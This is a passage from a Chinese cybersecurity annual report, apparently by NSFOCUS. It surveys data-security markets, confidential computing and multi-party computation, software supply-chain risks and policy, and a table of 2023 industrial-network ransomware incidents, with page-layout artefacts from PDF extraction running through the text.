25%,预计 2025 年中国数据要素市场规模将突破 2000 亿元。同时,数据要素的应用在各行各业中渗透迅速。2022年,我国数据要素在商业、民生、工业、政务等领域中市场规模占比分别为 9%、25%、24%和 10%。网络安全2024-守初心 创新质绿盟版3-13排版.indd 78网络安全2024-守初心 创新质绿盟版3-13排版.indd 782024/5/8 17:43:082024/5/8 17:43:08079新技术发展篇图 3.13 数据要素市场规模 主体规模:一方面,场内交易平台数量持续增加。截至 2023 年 12 月,场内数据交易所(中心)超 50 家,涵盖数据登记、确权发证(持有权、使用权、经营权)、价值评估、数据安全体系建设等方面在内的数据交易制度、规则持续完善,有效支撑数据合规高效流通使用。数据供应者、数据需求方、数据交易所(中心)、数据交易技术支撑方、第三方专业服务机构、监管方等数据要素多元市场主体涌现。另一方面,以场外交易为主的数据要素市场交易规模持续扩大,场外数据交易占到了整个数据交易规模的 95%左右。截止 2023 年 12 月,中国数商企业数量超 200 万家,近十年年均复合增长率超 30%,中小企业(注册资本 110 万-100 万)增速近 45%,成为推动数商企业规模加速壮大的主力军。数据产品供应商超150万家、占比超七成,数据安全、数据合规评估等类数商企业增速较快。b)数据安全市场据赛迪顾问统计分析,2022 年,中国数据安全防护与治理市场规模达 118.4 亿元,增长率达 20.6%。预计到 2025 年,中国数据安全防护与治理市场将达到 228.7 亿元。网络安全2024-守初心 创新质绿盟版3-13排版.indd 79网络安全2024-守初心 创新质绿盟版3-13排版.indd 792024/5/8 17:43:082024/5/8 17:43:08080网络安全 2024:守初心 创新质图 3.14 2019-2021 年中国数据安全产品及服务市场规模及增长1c)安全硬件信创市场2023 年,财政部发布政府采购需求标准征求意见稿中强调,应当将 CPU、操作系统符合安全可靠测评要求纳入采购需求。对应地,基于2023年中发布的 安全可靠测评工作指南(试行),中国信息安全测评中心在年底发布了安全可靠测评结果公告(2023 年第 1 号),包含 CPU、数据库、操作系统三方面的安全可靠测评结果。另一方面,信创产品需求旺盛,出货量持续攀升,平安证券预计 2023 年至 2028 年,我国信创 PC 和服务器合计出货量将超过 3000 万台,合计市场规模将超过 4000 亿元。在政策与市场的双轮驱动下,2024 年我国信创工程将迎来新一轮的快速发展周期。3.4.3 热点技术分析a)机密计算对于数据安全保护可以根据数据所处状态分为三种情况:传输时的数据、存储时的数据与使用中的数据。机密计算是一种基于硬件保护的可信执行环境(TEE)对内存、处理器中处于使用中的数据提供机密性与完整性保护的技术。其使用软硬件结合的方式,让程序与数据在安全可信环境中进行计算,可以防止攻击者从所处设备的操作系统层面或 Hypervisor 层1数据来源:赛迪顾问 2023.04网络安全2024-守初心 创新质绿盟版3-13排版.indd 80网络安全2024-守初心 创新质绿盟版3-13排版.indd 802024/5/8 17:43:082024/5/8 17:43:08081新技术发展篇面对 TEE 内数据的访问与窃取,做到数据“可用不可见”。机密计算信任链与传统信任链差异如图所示:图 3.15 传统信任链与机密计算信任链对比与全同态加密、安全多方计算、联邦学习、可信计算等其他能对使用中的数据进行保护的技术相比,机密计算在性能开销、安全性、可移植性、可扩展性等方面更具优势。机密计算除了能对数据提供保护,同时也可对计算程序提供机密性与完整性保护,并且具备可验证的能力,可以较易证明程序与数据处于安全环境中。机密计算的核心技术为可信执行环境技术,即 TEE 技术,其机密性主要是通过对 CPU寻址的隔离与内存隔离实现。目前主流的 TEE 技术包括 x86 架构下的 Intel SGX 技术、Intel TDX 技术、AMD SEV-SNP 技术以及 ARM 架构下的 TrustZone 技术与基于 TrustZone 技术的机密计算架构 CCA。其中,Intel SGX 技术的基本原理是在 Intel 原有架构上增加了一组新的指令集和内存访问机制,使得应用程序可以在其地址空间为需要保护的代码和数据设置一个私有的、被保护的区域,一般称这个区域为“enclave”。CPU 可以为这个区域的代码和数据提供机密性和完整性保护,故一般称其提供进程级别的安全隔离;而 AMD SEV 技术与 Intel TDX 技术则是能为虚拟机提供内存与 cpu 的机密性与完整性保护,一般称这类技术提供虚拟机级别的安全隔离。而 ARM TrustZone 技术则是将处理器资源分割为两个独立的世界:安全世界与非安全世界以实现整个系统级别的安全隔离。各类技术可信基对比如图所示。网络安全2024-守初心 创新质绿盟版3-13排版.indd 81网络安全2024-守初心 创新质绿盟版3-13排版.indd 812024/5/8 17:43:082024/5/8 17:43:08082网络安全 2024:守初心 创新质图 3.16 不同 TEE 技术的可信基对比机密计算的应用场景可以主要有三大场景:零信任云计算、多方协同计算以及数据安全共享。在传统的云计算环境中,用户需要将其业务与数据托管在云平台上,而云服务提供商有能力窃取用户数据与程序,因此存在数据泄露风险,需要用户信任云服务商。若能在云环境中使用机密计算技术,则能有效提高应对上述问题。由于机密计算可以防护宿主机层面的攻击,用户将自身业务与数据运行在云平台的 TEE 环境中,可以防止云服务商对其数据的窥探与窃取,提高数据隐私和安全性,进而移除用户对云厂商的信任,实现云上业务的零信任场景。而对于协同计算场景来说,当多个组织或个体需要合作进行数据分析或计算时,机密计算允许各方在不共享原始数据的情况下合作完成任务,如在医疗领域中多个医疗研究机构可以共同分析大规模的医疗数据,如基因组数据、病例记录等,以研究疾病治疗和预防。使用机密计算,这些机构可以在不泄露患者身份和敏感信息的情况下分享数据和分析结果。此外,机密计算也可用于数据共享,利用其数据“可用不可见”特性,数据提供方将数据置于机密计算应用中,安全地共享给数据使用方,数据使用方通过机密计算程序完成计算,仅可获取计算结果而无法窥探或窃取原始数据,实现了数据安全共享。除了上述场景之外,机密计算也可以与 FPGA、GPU 等加速卡结合,提高算力,为人工智能、物联网等领域提供安全计算环境,保护计算数据安全。然而,目前市场上各厂家推出的机密计算方案百花齐放,从底层 TEE 技术选型、到上层应用能力等均存在较大差异,导致机密计算技术架构兼容性差、生态隔离,互联互通有障碍,用户应用跨平台迁移困难、开发和维护成本大。因此,推进机密计算应用框架的标准化将成为机密计算下一步的发展趋势,其有助于打通不同厂商与平台间的生态隔离,通过制定统一接口标准与协议,做到不同机密计算应用间的互联互通,并通过制定安全标准可以约束不同技术架构下的机密计算应用满足安全性与合规性要求。最终降低用户应用迁移与开发成本,保障数据安全流转与使用,最终赋能数据要素安全流转,激活数据要素价值,为更广泛的领网络安全2024-守初心 创新质绿盟版3-13排版.indd 82网络安全2024-守初心 创新质绿盟版3-13排版.indd 822024/5/8 17:43:082024/5/8 17:43:08083新技术发展篇域提供数据使用安全保障。b)多方安全计算多方安全计算(MPC),最早由姚期智院士在上世纪 80 年代提出。该技术源于对“百万富翁问题”的研究,如今因数据安全与数据要素的重要性日益凸显而受到广泛关注。作为密码学领域中极具实用价值的前沿理论,多方安全计算在保护数据隐私和安全流转方面显示出独特优势。其主体的技术路线与应用如图所示。图 3.17 安全多方计算架构多方安全计算的核心是通过严谨精妙的密码学理论,使多个参与方能够共同计算数据而不泄露各自的私有信息。其以不经意传输(OT)为基础,又进一步扩展出混淆电路(GC)与秘密共享(SS)两条更富有表现力的技术路线,三类技术的简述如下:不经意传输假设发送方有两条带有标号(0/1)的信息,接收方能获得某指定标号的信息,而发送方并不知道接收方获得哪条信息,也容易将将 2 选 1 扩展成一般性的 n 选 m 的协议。混淆电路基于如下前提:所有的计算程序可由基础电路(与门&或门)构成。在这种范式下,计算过程分为两个关键角色:电路生成方和电路执行者。电路生成方负责构建和混淆电路,确保其功能性同时隐藏其内部逻辑。电路执行者则在这个被混淆的电路上运用自己的数据进网络安全2024-守初心 创新质绿盟版3-13排版.indd 83网络安全2024-守初心 创新质绿盟版3-13排版.indd 832024/5/8 17:43:092024/5/8 17:43:09084网络安全 2024:守初心 创新质行计算。秘密共享基于如下前提:所有运算都可由基础运算(如加法、乘法)组成。该方案下,由多方掌握一个真实数据的多份分享,并在分享之上构建密文加法/乘法(通常还会定义出更一般的初等函数运算),最终通过保障每一个步骤中所产生的中间交互值与结果值都为无意义的分享值,来确保整个计算链路的安全性。在实际应用中,多方安全计算通常结合使用同态加密、零知识证明等经典密码学技术,以提高恶意参与者的安全性和整体效率。为了提高实用性,多方安全计算的实践者们基于底层密码原语进一步定义了一系列安全算子。其中部分重要算子的总体能力与典型应用如表所示:表 3.1 部分安全多方计算能力与应用算子名称简要功能常见应用隐私集合求交两个或多个集合计算交集,除交集内容以外,各集合内容不被其它参与者所知查询黑白名单、二三四要素核验隐私信息检索根据某个 key 查询某库中对应的 value,key 的值不被库拥有方知晓 隐私保护的报告查询SCQL在多个数据库中进行 SQL 分析,而各方数据库原始数据不出域多方数据库合作GMPC提供可编程的基础算子,如 if,while, ,-等,用于构建多方密文计算程序构建安全计算平台多方安全计算有别于机密计算等以可信硬件为主的可控类流通方案,其更依赖于可公开验证的密码学理论,因而在部分场景中具有不可替代性。然而,在当下阶段,此类方案仍存在如下等不可忽视的问题:计算成本高耗时长:在多方安全计算任务中,由于其底层依赖于复杂的加密算法和协议,计算过程往往非常耗时和资源密集。虽然 40 年来的研究,尤其是近几年的持续突破已经带来了多个数量级的性能飞跃,但相比于同问题的明文计算,典型 MPC 任务所需的时间消耗仍会膨胀数百倍至数十万倍,这显著限制了以实用为导向的场景。安全性未得到普遍认可:多方安全计算的理论前沿强依赖于密码学顶会论文,然而由于其理论的复杂度,难以被大众简单的理解。同时,即使是最优秀的密码学研究者,也无法保证其理论完全无漏洞。此外,实际实现密码学方案的科研人员也难以避免在实现时带来额外的漏洞。扩展到多方困难:由于密码学理论本身的限制,除非经过特意的设计,常规的密码原语很难面对三方以上的参与者。而真实世界的任务往往需要由多个对等的参与方进行合作,或者需要为将来更多的参与方预留加入能力。网络安全2024-守初心 创新质绿盟版3-13排版.indd 84网络安全2024-守初心 创新质绿盟版3-13排版.indd 842024/5/8 17:43:092024/5/8 17:43:09085新技术发展篇 二次开发难度大:由于多方安全计算仍处于底层能力范畴,与真实用户日常所使用的软件之间仍有很大距离,目前往往需要软件开发商理解多方安全计算的能力,并基于此能力进行二次开发;如何提供一个简洁易懂乃至得到各方公认的安全平面供非密码学软件开发人员理解使用仍是一个探索中的问题。3.5 供应链安全3.5.1 国内外发展现状软件供应链这一概念源于美国军方军用需求主导的编程服务供给模式。1942-1962 的防空大型计算机项目(SAGE)率先对软件供应链体系进行实践,距今已有将近 80 年。信息化时代开始至互联网时代早期,安全威胁主要以“木马蠕虫”形式通过储存介质进行传播,其更多的是针对个人终端及破坏性指令对操作系统及系统软硬件实施攻击。其传播范围及影响也相对较小,安全视角也未提升至整个供应链安全范畴。随着产业链逐渐发展,大量新技术的引入令软件风险防护范围从个体层面提升至供应链层面,安全视角发生了重大变化。2021 年 5 月,美国发布改善国家网络安全行政命令(Improving the Nations Cybersecurity),其中一项重点任务就是加强软件供应链安全,并提出了较为系统的指导建议。其中包括:建立专项工作组,确定“关键软件”定义及范围,建立关键软件清单,对清单涉及产品进行审查,完善对标达标产品清单的采购制度,发布相应指南及基本测试工具,要求相关机构针对软件供应链安全建立安全评级体系。近年来,我国高度重视关键信息基础设施保护和数据安全工作,相关主管部门也已关注软件供应链安全问题并提出指导意见与要求,如针对关键设备软件采购建立准入机制与供应商审查机制;针对开源场景开展安全状况摸底;针对软件供应链安全管理规范和技术标准组织标准规范研究起草工作。监管单位从软件采购、开源技术引入、供应链整体安全等角度分别切入,不同程度地开展了对行业及产业的指导工作。但从整体来看,我国对软件供应链安全管理尚未形成完整链条的无缝连接,体系化的部署和指导还处在初期阶段。软件供应链安全定义范围:从安全威胁角度无论使用故意、非故意、意外、偶然、误用、滥用、错误、弱点、缺陷、过失或故障等何种术语描述的对软件需求方资产造成损失或产生不良影响的事件及相关条件,都应称为软件供应链威胁。因此,软件供应链安全管理是通过一定方法,识别、评估和缓解与产品和服务的分布式或网络化的必要供应链风险的过程。网络安全2024-守初心 创新质绿盟版3-13排版.indd 85网络安全2024-守初心 创新质绿盟版3-13排版.indd 852024/5/8 17:43:092024/5/8 17:43:09086网络安全 2024:守初心 创新质软件供应链安全管理涉及三个身份:供方(引入),用方(使用),需方(交付)。与之对应涉及到的管理重点各有侧重。引入:涉及软件采购、服务采购、开源组件引用。供方的安全合规、能力资质、服务支持等技术指标进行限制,通过要求需方设立安全要求引导供方完成安全能力与安全体系的建设,并符合基本要求。使用:使用方在利用组件进行二次开发时应满足软件开发生命周期要求,对内需要有明确的安全开发、安全运维的管控流程,明确管理岗位与管理职责,并可以通过管理工具留痕加以验证落实。交付:对需方应提供可信的组件信息,保证软件产品开发流程的安全合规,保证服务支持、并对自身信息化环境有明确的应急甘泉响应机制,保证能够将安全风险控制在萌芽状态。综上所述,软件供应链安全监管边界在于对现有的安全生产与安全建设体系进行审查(主管机构对各行业安全体系的建设要求),对安全管理资质进行验证(国标、行标),对软件供应链基础安全工具进行审查(SAST、IAST、SCA、RASP 等)。从安全管理制度、安全运营资质、安全管理工具这三个层面进行审查。3.5.2 软件供应链安全风险目前,我国软件产业的自主生态根基还相对薄弱,在基础软件和应用软件企业中,除了极个别走完全自主研发道路的企业,大部分企业对开源软件的依赖度依然很大。操作系统、数据库、中间件软件、应用软件、设备固件等的开发、编译、测试都越来越多的采用开源代码,软件供应链的开源化趋势越来越明显,大多数企业软件产品的供应链中,开源软件扮演者至关重要的角色。当前的开源世界仍由美国主导,不光绝大多数开源基金会和开源项目都位于美国,几乎所有开源许可证和代码托管平台也都由美国的学术界和工业界主导(数据来源:中国开放指令生态联盟开源项目风险分析与对策建议)。在我国未形成成熟的开源生态体系之前,我国的软件产品依然面临着漏洞后门(技术)、开源协议(商务)、出口管制(政策断供)等供应链攻击风险。技术风险:调查发现有 85%的代码库含有至少四年未曾更新的开源依赖项。2020 年,包含存在漏洞的开源组件的代码库百分比为 84%,较 2019 年上涨了 9%。包含高风险漏洞的代码库的百分比从 49%上升至 60%。2020 年的审计中再次发现了 2019 年在代码库中发现网络安全2024-守初心 创新质绿盟版3-13排版.indd 86网络安全2024-守初心 创新质绿盟版3-13排版.indd 862024/5/8 17:43:092024/5/8 17:43:09087新技术发展篇的几个十大开源漏洞(CVE-2019-11358、CVE-2015-9251、CVE-2019-10744),并且所有这些漏洞的百分比均有显著增加。美国新思科技公司在2021 年开源安全和风险分析报告中指出,2020 年审计的代码库中,65%包含存在许可证冲突的开源组件,通常涉及“GNU通用公共许可证”,26%的代码库采用没有许可证或定制许可证的开源代码。商务风险:极端情况下,如果美国NSF、NASA以国防安全为由,制定一个新的开源许可证,限制其资助的所有开源项目只能在美国使用和发布,则美国以外的其他国家将失去这部分开源项目的使用权。我国公司一旦使用,就会侵犯知识产权,这一潜在风险不容忽视。政策风险:开源相关的法律约束除开源许可证外,还包括出口管制和司法管辖权。这就意味着,如果一个开源项目或开源组织声明遵从美国的出口管制条例,此时一旦美国修改条例,将一些核心基础软件加入到管制中,那么大量核心开源项目将受到出口管制。一旦美国针对中国公司的贸易管制政策蔓延到开源项目,中国公司托管在海外的开源代码资产将面临冻结风险一旦我国受到上述基于开源生态的供应链攻击,轻则造成国家财产损失,重则导致国家生产、生活秩序的混乱,因此对于软件供应链的管理体系建已是刻不容缓的工作。软件供应链管理体系建设既是自主生态根基建设的必要需求,又是自主生态根基建设的催化剂,只有通过打造健全、安全的软件供应链管理体系,才能实现软件产品开发使用的透明化,最终逐步实现核心产品、核心模块的自主可控,从根本上解决供应链连续性和安全性问题。数字技术由ICT/OT产品组成,并通过服务交付和支持,这些要素构成了数字技术产品(以下统称为“软件”)的供应链生态。针对软件供应链的攻击,具有难发现、难溯源、难清除、低成本、高效率等特点,结合软件产品的生命周期,软件供应链攻击通常可以划分为如下几类,如图所示:网络安全2024-守初心 创新质绿盟版3-13排版.indd 87网络安全2024-守初心 创新质绿盟版3-13排版.indd 872024/5/8 17:43:092024/5/8 17:43:09088网络安全 2024:守初心 创新质图 3.18 软件供应链攻击表 3.2 供应链攻击的类型对应字母威胁类型供应链攻击案例A将恶意代码提交到源存储库Linux 恶意上传带有漏洞的 patch:研究人员试图通过邮件列表上的补丁程序故意将漏洞引入 Linux 内核。B恶意托管源代码管理平台PHP 官方 git 被攻陷:攻击者破坏了 PHP 的自托管 git 服务器,并注入了两个恶意提交。C使用正式流程构建,但源代码与源代码管理不匹配Webmin:攻击者修改了生成基础结构以使用与源代码管理不匹配的源文件。D被攻陷的构建平台SolarWinds:攻击者破坏了构建平台,并安装了一个在每次构建过程中注入恶意行为的植入程序。E使用错误的依赖关系(即 A-H,递归)事件流攻击:攻击者添加了一个无害的依赖项,然后更新该依赖项以添加恶意行为。更新与提交给 GitHub 的代码不匹配(即攻击 F)F上传不是由 CI/CD 系统生成的中间件CodeCov:攻击者使用泄露的凭据将恶意中间件上传到GCS存储桶,用户可以从中直接下载。G把恶意包托管到仓库攻击包镜像:研究人员为几个流行的包存储库运行镜像,这些库可能被用来服务恶意包。H欺骗开发者使用恶意包Browserify TypoShucking:攻击者上传了一个与原始文件同名的恶意软件包。当前,我国软件产品的供应链存在着透明度不足、各个组织对供应链的管理水品参差不齐、缺乏统一的软件供应链管理标准及机制等特征。从软件开发者、使用者以及管理机构的角度来看,软件供应链的各个环节均存在着巨大的安全隐患。3.5.3 当前国内外软件供应链安全管理制度落地情况美国最早提出宏观的供应链安全管理(SCRM),后细化到信息通信技术供应链安全管理(ICT-SCRM),又进一步提出软件供应链安全管理。网络安全2024-守初心 创新质绿盟版3-13排版.indd 88网络安全2024-守初心 创新质绿盟版3-13排版.indd 882024/5/8 17:43:092024/5/8 17:43:09089新技术发展篇美国政府要求美国国家标准与技术研究院(NIST)牵头开展软件供应链相关标准的研究。要求标准应能够反映评估对象的基本安全水平,标准设计也应该对目标产品已通过的测试和评估进行统计与考量。指南建议供应商测试其软件源代码的最低标准。NIST 应检查所有相关信息、标签和激励计划,采用最佳实践,并确定、修改或开发推荐的标签或分层软件安全评级系统。建立试点项目,并审查方案侧重于消费者的易用性和安全性。我国软件供应链安全针对平台建设、制度保障、配套工具、政策引导等方面开展了相关工作。软件供应链安全制度建设逐步加强,有关行业管理部门依据国家网络安全法规针对性地制定和发布了一系列政策指导文件。在各方努力下涌现出一批国产开源社区,如木兰开源社区、Openl 启智社区、华为 openGauss 等开源社区。通过对开源技术进行孵化,将技术领先国家优秀的开源理念及管理模式经验加以延续,并辅以符合我国自身发展特性的管理工具和方法,保证开源软件的自主可控。各大安全厂商也在加强配套工具建设,竞相推出各自的软件供应链安全保障方案,研发专用的代码扫描,组件成分分析工具,帮助用户对自身了解自身软件资产情况,提升软件资产透明度。在供应链安全管理方面,美欧等发达国家由于具备技术先发优势,已经建立起了比较全面的软件供应链安全管控机制。但在实际推广过程中并不顺利,也经历了几轮大的调整。2021 年,美国政府相关部门发布指南,建议供应商测试其软件源代码的最低标准,包括确定推荐的手动或自动测试类型(如代码审查工具、静态和动态分析、软件组成成分分析和渗透测试)。建立试点项目,启动由现有消费品标签计划通知的试点计划,并要求政策设计中需要考虑激励制造商和开发人员参与的方法。美国政府已要求美国国家标准与技术研究院(NIST)牵头开展软件供应链相关标准的研究,确定消费者软件标签计划的安全软件开发实践或标准,并考虑消费者软件标签程序是否可以与任何类似的现行政府计划相结合或仿效,研究其符合适用的法律。要求标准应能够反映评估对象的基本安全水平,标准设计也应该对目标产品已通过的测试和评估进行统计与考量。NIST 应检查所有相关信息、标签和激励计划,采用最佳实践,并确定、修改或开发推荐的标签或分层软件安全评级系统。审查方案侧重于消费者的易用性和安全性。我国在软件供应链领域也分别针对平台建设、制度保障、配套工具、政策引导这几个层面开展了具体工作。在各方努力下涌现出了一批国产开源社区,如木兰开源社区、Openl 启智社区、华为 openGauss 等开源社区。通过对开源技术进行孵化,将技术领先国家优秀的开源理念及管理模式经验加以延续,并辅以符合我国自身发展特性的管理工具和方法,保证开网络安全2024-守初心 创新质绿盟版3-13排版.indd 89网络安全2024-守初心 创新质绿盟版3-13排版.indd 892024/5/8 17:43:102024/5/8 17:43:10090网络安全 2024:守初心 创新质源软件的自主可控。用于保障软件供应链安全的制度建设也在稳步推进。信息技术 软件安全保障规范(GB/T 309982014)对软件安全保障建设做出了规范要求,定义了关键软件,对软件的开发、使用、管理等安全场景做出了建设指导。网络安全审查办法中提到了保障确保关键信息基础设施供应链安全,并以此为出发点提出软件安全审查的具体办法。软件组成成分表(SBOM)制度的推广也在稳步推进,通过在开发过程中建立 SBOM 来提升软件透明度,减少企业审计难度,降低监管机构的审查难度。各大安全厂商也在加强配套工具建设,竞相推出各自的软件供应链安全保障方案,研发专用的代码扫描,组件成分分析工具,帮助用户对自身了解自身软件资产情况,提升软件资产透明度。信息安全技术 ICT 供应链安全风险管理指南(GB/T 36637-2018)对 ICT 供方的供应链安全风险管理进行规范,关键信息基础设施的运营者也可以依据“指南”优化自身安全防护策略。金融领域也发布关于供应链安全风险提示的函要求加强供应链安全风险管控,配套开源软件与开源软件服务商评测规范,对软件供应链安全建设做出指导。未来,随着国产软件组件清单标准、开源软件审查制度、信创开源建设、国产开源软件许可证机制等相关领域的各项标准逐步推出,将会进一步明晰软件供应链安全发展方向,将软件供应链安全理念落实到实际操作中。3.5.4 软件供应链安全管理抓手 开展软件物料成分清单摸底,通过对关基领域进行摸底摸清重点领域的软件组成成分现状,对国产化率及自主可控的发展理清脉络,对卡脖子的关键组件进行重点攻关,解决其有无问题,保证国家信息产业的安全。争取一切可以争取的力量,如国内企业的核心依赖组件进行国产化平台牵引。海外,如欧洲企业可能也会大量使用开源软件作为自身专业软件的研发基础,可以通过在我国自身开源组件平台实施迁移,在保证开发者知识产权的情况下实现版权风险规避,将部分核心技术在保留其自主知识产权与版权的基础上进行国产化平台迁移认证,保证其规避美方的知识产权封锁。保证业务的可用性,同时加强国产开源平台的建设。针对党政领域出台供应链安全建设指南组合,如采购规范,组件准入规范、供应链体系建设规范、人员及制度管理规法等,提出类似美国提出国防采购指南的官方指导文网络安全2024-守初心 创新质绿盟版3-13排版.indd 90网络安全2024-守初心 创新质绿盟版3-13排版.indd 902024/5/8 17:43:102024/5/8 17:43:10091新技术发展篇件,为后续社会层面的供应链安全体系建设打下基础。建立党政系统供应链安全管理标准族,后经改良下放至国有企业,作为市场标杆供其他组织机构加以学习借鉴。3.6 工业互联网安全在世界经济增长乏力的背景下,我国 5G 发展进程推动了“5G 工业互联网”的融合,为工业互联网数字经济注入新的动力。5G 与工业的融合发展正逐步深入工业生产核心环节,这打破了传统工业网络封闭的生产环境。正在进行的俄乌、巴以战争让工业互联网安全形势更加复杂,使得暴露在互联网之下的工业网络不可避免的成为现代战争打击的首要目标,这带来了更加严峻的安全挑战。3.6.1 热点安全事件工业互联网应用加速向各行业渗透应用,全球更多的工业企业与工业互联网连接,打通了 MES、ERP 等系统的连接,联网的工控设备持续增加,形态及复杂度上呈指数增长。网络攻击、远程控制、控制设备漏洞等问题加剧了系统面临的安全威胁。近年来工业互联网重要行业领域的安全事件频频发生,现有的防护手段和安全管理措施不足以支撑与日俱增的攻击。纵观 2023 年,互联网共收集的 98 起工业网络相关的安全事件,涉及能源、制造业、航空、交通运输、市政、国防、医疗等多个行业,工业设备和数据的安全可靠面临着严峻的考验。攻击类型主要以勒索攻击为主,相较 2022 年相比仍呈上升趋势,LockBit、Black Basta、BlackCat/ALPHV、CL0P、美杜莎等知名勒索软件组织活跃,给受害者带来了巨大的经济损失。其中,制造业和能源是工业互联网主要的组成,受网络安全影响最严重,共占比为 63.27%。在供应链攻击方面,值得关注的是工控安全独角兽 Dragos 遭到勒索软件攻击,Dragos 安全服务覆盖了美国 70%的电网,是非常重要的一个环节,如果攻击者能够窃取或破坏其关键数据和系统,可能会对美国的电力供应造成灾难性的影响。好在 Dragos 有效地抵御和减轻攻击影响,攻击者只成功下载了一些“一般用途数据”和 25 份情报报告,没有造成严重的信息泄露。此外,世界地缘政治的紧张局势也影响到了网络空间,参与政治性事件并发起网络攻击的黑客组织威胁持续上升。2023 年 10 月,巴以冲突再次升级,双方不仅在实体领域展开了激烈的军事对抗,也在网络领域展开了激烈的网络战,各种黑客组织也加入了这场网络战,以支持或反对巴勒斯坦或以色列的立场。其中,伊朗黑客组织CyberAv3ngers对以色列加油站、电力基础设施等进行攻击,造成了一系列的电力故障和数据泄露。伊朗同样受到亲以黑客组网络安全2024-守初心 创新质绿盟版3-13排版.indd 91网络安全2024-守初心 创新质绿盟版3-13排版.indd 912024/5/8 17:43:102024/5/8 17:43:10092网络安全 2024:守初心 创新质织 Predatory Sparrow 等对其工业网络的攻击,反对伊朗的威胁和挑衅。表 3.3 2023 年工业网络安全事件月份事件国家/区域行业/系统攻击类型后果1加拿大铜矿场遭到勒索软件攻击被迫关闭加拿大矿业勒索攻击被迫以手动作业,关闭采矿设备1美 国 铁 路 和 机 车 公 司 Wabtec Corporation 遭到 LockBit 勒索攻击美国交通运输LockBit 勒索攻击数据泄露1尼日利亚石油和天然气行业遭严重网络攻击尼日利亚能源网络攻击系统的门户网站无法访问,部分数据作为盗窃凭证被公开1历史上第一个 RTU 被勒索攻击白俄罗斯未知GhostSec 勒索攻击未知1德国塑料组件、金属加工和环境技术制造商 Fritzmeier 集团遭受网络攻击德国制造业网络攻击业务受到影响1全球最大海事组织 DNV 遭勒索攻击美国交通运输勒索攻击数千艘船舶运营受影响1SOLAR INDUSTRIES INDIA 遭BLACKCAT 勒索攻击印度制造业BLACKCAT 勒索攻击 攻破公司的基础设施,窃取了 2TB 的数据,包括与武器生产有关的秘密军事数据。2半 导 体 设 备 制 造 商 MKS Instruments 成为勒索软件攻击的受害者美国制造业勒索攻击公司网站离线,部分设施停止运行,生产相关系统停止使用2邮票和激光技术制造商 Trodat 遭勒索攻击奥地利制造业勒索攻击数据加密、全球大部分中央IT 服务拒绝服务2为法国铁路提供服务的照明制造商 Lumila 遭勒索攻击法国制造业勒索攻击未知2流体动力和动力传输技术制造商Gates Industrial Corporation plc遭恶意软件攻击美国制造业恶意软件攻击业务受到影响、暂停生产和运输、数据泄露2滑雪板制造商Burton Snowboards发生网络事件美国制造业未知取消了所有在线订单2伊朗 37 个工业通信系统被黑客攻击导致下线伊朗未知网络攻击37 个支持工业通信标准协议Modbus 的系统被攻陷并下线,攻陷系统 IP 地址以及部分截图被公开2几十个美国电力和液化天然气场所被恶意攻击美国能源Chernovite 组织PIPEDREAM 恶意软件业务受影响2德国多家机场遭 DDoS 攻击德国交通运输DDOS 攻击多个机场网站无法访问2政供水公司 Aguas do Porto 遭到勒索攻击葡萄牙市政LockBit 勒索攻击未知2工业设备供应商 Stiles Machinery Inc 遭受网络攻击美国制造业未知关闭系统以进行保护3节能绝缘材料制造商 STEICO 集团成为披露的网络攻击目标德国制造业未知影响了生产运营和管理3印度尼西亚国家核能机构(Batan)数据遭遇泄露印度尼西亚能源黑客入侵泄露1.4GB数据在暗网泄露。3南非一个电力公司遭恶意软件攻击南非能源恶意软件攻击未知3巴塞罗那医院遭 Ransom House勒索软件攻击巴塞罗那医疗勒索软件攻击计算机系统瘫痪,手术和检查等业务受影响3物流供应商疑因勒索软件攻击导致 IT 系统中断,空客德国工厂至少部分停止生产德国制造业勒索攻击/供应链攻击IT 系统中断,影响工厂生产。网络安全2024-守初心 创新质绿盟版3-13排版.indd 92网络安全2024-守初心 创新质绿盟版3-13排版.indd 922024/5/8 17:43:102024/5/8 17:43:10093新技术发展篇月份事件国家/区域行业/系统攻击类型后果3家用电器制造商 Groupe SEB 的 IT团队检测到利用漏洞的尝试法国制造业网络攻击未知3工业自动化和机器人公司 HAHN Group 遭网络攻击德国制造业网络攻击所有系统被迫关闭3包装制造商 Storopack 遭勒索攻击德国制造业勒索攻击应用程序服务器和域控制器被加密3知名意大利汽车品牌法拉利遭勒索攻击意大利制造业RansomEXX 勒索攻击业务中断、数据泄露3存储巨头西部数据遭入侵美国制造业数据泄露严重影响公司业务运营。3医疗保健设施提供商遭受网络攻击美国医疗网络攻击数据泄露4缝纫机制造商 BERNINA 遭受勒索攻击瑞士制造业ALPHV 勒索攻击数据泄露、业务受到影响4中国台湾电脑零部件制造商微星遭勒索攻击中国台湾制造业Money Message 勒索攻击源代码和数据库在内 1.5TB数据,被要求支付 400 万美元赎金4以色列上加利利(Upper Galilee)地区 10 个水控制器遭到攻击以色列农业OPIsrael 行动多个受害农场的灌溉系统停止运行、影响农业生产4德国武器制造商 Rheinmetall 遭受网络攻击德国制造业网络攻击业务降级运行4械制造商 Bobst 遭受了两次网络攻击瑞士制造业Black Basta 勒 索 攻击未知4测量技术和自动化供应商 Anton Paar 遭受勒索攻击奥地利制造业Black Basta 勒 索 攻击加密该公司约 10%的内部PC 和服务器4意 大 利 供 水 公 司 Alto Ca lore Servizi SpA 遭到勒索软件攻击意大利市政美杜莎勒索软件攻击 IT 系统无法操作以及访问数据库,大量主要数据被泄露。5伊朗核电生产和开发公司(AEOI)遭数据窃取泄露伊朗能源未知10 万多封电子邮件被泄露。75GB 敏感核数据被窃取。5瑞士工业自动化巨头 ABB 公司遭遇勒索软件攻击瑞士制造业勒索攻击数百台服务器被入侵,业务严重扰乱。5工控安全独角兽 Dragos 遭勒索软件攻击美国供应链勒索攻击入侵公司的 SharePoint 云服务和合同管理系统。5法国大型制造企业 Lacroix 遭网络攻击法国制造业网络攻击8 个制造工厂有 3 个受到了影响,三大工厂被迫关闭超一周5俄 罗 斯 液 压 设 备 厂 Donward Hydraulic Systems 遭 TWELVE 黑客组织攻击俄罗斯制造业网络攻击破坏 50TB 的文件存储,删除所有备份,加密了个人电脑和服务。6全球最大的拉链制造商 YKK 美国业务遭到勒索攻击美国制造业LockBit 勒索攻击未知6一家专业从事安全出入控制领域Automatic Systems 遭勒索攻击比利时制造业ALPHV 勒索攻击数据泄露6海 事 工 业 巨 头 Brunswick Corporation 遭网络攻击美国制造业网络攻击全 年 预 估 损 失 6,000 万 至7,000 万美元6美国国家实验室和核废料储存设施遭受网络攻击美国能源网络攻击未知6石油和天然气巨头壳牌证实遭到Clop 勒索软件攻击荷兰能源已知漏洞攻击/勒索软件攻击未知6全球最大的乐器制造商 Yamaha Corporation 